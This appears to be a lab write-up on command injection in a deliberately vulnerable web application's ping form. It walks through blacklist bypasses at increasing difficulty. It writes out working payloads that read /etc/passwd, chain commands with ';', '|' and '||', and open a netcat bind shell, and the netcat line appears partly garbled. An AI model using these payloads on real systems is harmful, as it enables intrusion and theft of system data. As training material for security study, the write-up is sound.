Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
Underlying code does not check if $target matches an IP Address. No filtering on special characters.
; in Unix/Linux allows for commands to be separated.
192.168.0.1; pwd - Prints working directory, see below:
192.168.0.1; cat /etc/passwd | tee /tmp/passwd - Displays the contents of
/etc/passwd on the webpage and also copies the contents of
/etc/passwd file to the
&& - AND Operator
| - PIPE Operator - Completely removes IP address from output.
Viewing source code, we see that a blacklist has been set to exclude
;. As noted above, we can use
| as a replacement:
192.168.0.1| cat /etc/passwd. Double
|| can also be used, as shown below:
Can also use
| pwd or
|| pwd (no need to include the ip address.)
Viewing source code, more extensive blacklist has been set. Slightly trickier, however the answer is in the view source -
'| ' => '', - note that there is a space after the
| character. If we try
| pwd, no output is returned, however if we use
|pwd we are including our command within this space, as shown below:
192.168.0.1; /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe - Creates a netcat listener, then use
nc 192.168.0.1 4444 to connect. (Change IP addresses to match those of target machine)
Points to note:
- Ensure you are using commands specific to the target you are trying to attack, all of the above are Linux, Windows commands will be different.
- Try commands with and without a space between them.
- You will not always have access to the source code.